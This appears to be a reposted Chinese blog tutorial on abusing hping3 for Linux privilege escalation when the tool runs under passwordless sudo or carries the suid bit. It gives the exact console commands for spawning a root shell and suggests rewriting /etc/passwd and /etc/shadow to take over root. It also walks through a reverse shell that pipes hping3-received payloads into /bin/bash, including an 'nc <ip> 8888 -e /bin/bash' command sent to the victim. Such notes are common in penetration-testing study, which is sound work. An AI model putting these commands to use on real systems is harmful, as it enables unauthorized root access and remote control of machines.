當hping3工具有個神奇的地方，hping3支持交互式運行，終端中輸入hping3后可以進入一個hping3的控制臺，這個控制臺不但可以執(zhí)行hping3自己的命令，也可以把非自身命令定向到shell終端去，當作系統(tǒng)命令執(zhí)行，因此當hping3具有suid位或者用戶有權(quán)限通過sudo執(zhí)行hping3的時候，hping3可以用來被提權(quán)。

1、sudo情況

1）如圖，當前用戶可以sudo免密執(zhí)行hping3

2）執(zhí)行如下代碼即可提權(quán)成為root賬戶，如圖

~:sudo hping3
hping3>/bin/bash

########################## 反彈SHELL ##########################

//順便記錄下hping3通過傳輸文件進行反彈shell的做法（網(wǎng)上很多文章提到這個環(huán)節(jié)的步驟，幾乎都不能復(fù)現(xiàn)，原因在于使用了--safe參數(shù)。這個參數(shù)是保證文件傳輸過程中，如果數(shù)據(jù)包丟失可以重傳。本來應(yīng)該是一個人畜無害的參數(shù)，但是確實無法運行，原因沒有細究）

1）攻擊機監(jiān)聽用nc監(jiān)聽一個端口

nc -lvnp 9999

2) 被攻擊機器通過hping3監(jiān)聽流量，并重定向到/bin/bash中

hping3 192.168.146.128 --listen signature --udp -p 5656 -I enp0s3 |/bin/bash

3）攻擊機編寫反彈shell的bash命令

echo "nc 192.168.146.128 8888 -e /bin/bash" > shell

4）通過hping3將shell命令傳送到被攻擊機

hping3 192.168.146.136 --udp -p 5656 -d 100 --sign signature --file ./shell

5）現(xiàn)在看之前監(jiān)聽的9999端口應(yīng)該已經(jīng)接收到shell了

*PS這個過程個人感覺有點雞肋，不能用來提權(quán)。因為linux下，sudo命令不會被繼承到管道符和重定向符之后。也就是說，即使用sudo hping3 ...|/bin/bash。執(zhí)行后得到的shell也不是root權(quán)限。既然如此，反彈shell有一萬種方式，為什么要用這么一個不穩(wěn)定的方式。

2、有suid位情況

1）如圖，hping3具備suid位

2）直接進入hping3控制臺，便具備了root資源的訪問權(quán)限

此時可以通過改寫/etc/passwd和/etc/shadow文件，修改root密碼，進而獲取root權(quán)限

總結(jié)

以上是生活随笔為你收集整理的sudo -hping3提权（含 suid位）的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。